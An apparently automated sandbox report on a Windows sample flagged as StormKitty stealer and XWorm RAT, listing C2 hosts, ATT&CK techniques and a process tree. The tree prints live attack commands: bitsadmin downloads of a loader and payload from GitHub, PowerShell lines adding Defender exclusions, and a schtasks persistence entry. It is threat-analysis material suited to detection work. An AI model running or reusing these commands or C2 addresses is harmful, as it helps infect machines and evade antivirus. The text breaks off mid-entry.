stormkitty | bb80103ac259b0a260fe3fabea6c6ceedf4286f43b24665a9ec30bc1b19bd267

Analysis

max time kernel
60s
max time network
61s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Files/115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe
Size

106KB
MD5

af96147082306e597383ea83924d92ec
SHA1

2e092326740df77598ac3cb2898ae6adfb9f100f
SHA256

115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316
SHA512

b141e8eab204af1cff7d460974b04bf51cef24e70b7537f76862f6f633aa1eefb8fdbbb8ec9d7cb6dab0e97244eff560bdcc785bf64a253c40cb3c42c84bc7db
SSDEEP

3072:+fWi4MdM81BorInbhk9H+ZifSKf+nbGOD5zMQUM:+z4MdM8for0iSKgNIQ

Score

10^/10

stormkitty xworm discovery dropper execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

O9hqaPBmS3qVW6ON

Attributes

Install_directory
%AppData%
install_file
AggregatorHost.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral22/memory/4848-134-0x0000000000D80000-0x0000000000D90000-memory.dmp	family_xworm
behavioral22/files/0x00140000000243c3-230.dat	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral22/memory/4848-190-0x000000001E930000-0x000000001EA50000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5792	powershell.exe
1628	powershell.exe
3476	powershell.exe
5660	powershell.exe

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

pid	Process
3748	bitsadmin.exe
4608	bitsadmin.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
31	4620	Process not Found

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSessionUpdate.lnk	system.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSessionUpdate.lnk	system.exe

Executes dropped EXE 1 IoCs

pid	Process
1980	WindowsSessionUpdate

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsSessionUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsSessionUpdate"	system.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	raw.githubusercontent.com
31	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5344	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
5660	powershell.exe
5660	powershell.exe
5660	powershell.exe
4848	system.exe
4848	system.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4848	system.exe
Token: SeDebugPrivilege	5792	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	5660	powershell.exe
Token: SeDebugPrivilege	4848	system.exe
Token: SeDebugPrivilege	1980	WindowsSessionUpdate

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
376	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
376	AcroRd32.exe
4848	system.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5520 wrote to memory of 376	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	87
PID 5520 wrote to memory of 376	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	87
PID 5520 wrote to memory of 376	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	87
PID 5520 wrote to memory of 5056	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	88
PID 5520 wrote to memory of 5056	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	88
PID 5520 wrote to memory of 5056	5520	115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe	88
PID 5056 wrote to memory of 4608	5056	mshta.exe	89
PID 5056 wrote to memory of 4608	5056	mshta.exe	89
PID 5056 wrote to memory of 4608	5056	mshta.exe	89
PID 376 wrote to memory of 5892	376	AcroRd32.exe	96
PID 376 wrote to memory of 5892	376	AcroRd32.exe	96
PID 376 wrote to memory of 5892	376	AcroRd32.exe	96
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 4080	5892	RdrCEF.exe	97
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98
PID 5892 wrote to memory of 3608	5892	RdrCEF.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Files\115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe
"C:\Users\Admin\AppData\Local\Temp\Files\115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5520
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\successful payment.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:376
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5892
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F7B9592F992A6992F651BCAEACD4305 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4080
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E88CB4F436A0757B95D178223D9960F9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E88CB4F436A0757B95D178223D9960F9 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3608
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EA96E42003640A5FEB6CB70CCF1D6FC --mojo-platform-channel-handle=2288 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3984
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6F58D047CA650300F59284492C4964F2 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4112
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1C422A4F7CC9702C656C6619A15E1437 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:412
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DA24A0EBE046E0D681BA73F493BCE898 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DA24A0EBE046E0D681BA73F493BCE898 --renderer-client-id=8 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:1168
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/tarksloader.hta C:\Users\Admin\AppData\Local\Temp\tarksloader.hta
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:4608
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\tarksloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:4760
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:3748
  - - C:\Users\Admin\AppData\Local\Temp\system.exe
      "C:\Users\Admin\AppData\Local\Temp\system.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5660
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
1⤵
PID:1532

C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
0d2bd1b22d086762f87c7457e7ed385a

SHA1
5c02fa3b2994519d20446fc9c1bc81f27b0497f5

SHA256
1fbc0658f3a6a5122cca220411a0542c8e6cd217c512356b363413dd6b5e59cf

SHA512
284516f54cf9faccfe9cdd319d3aaf5f087eeea6bc34ae263da7dd5673da61bcf39ebd61c3ff7cd7980e5b2869b0dab4d89d0dd4f610559b6ce3437517f0ef32

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
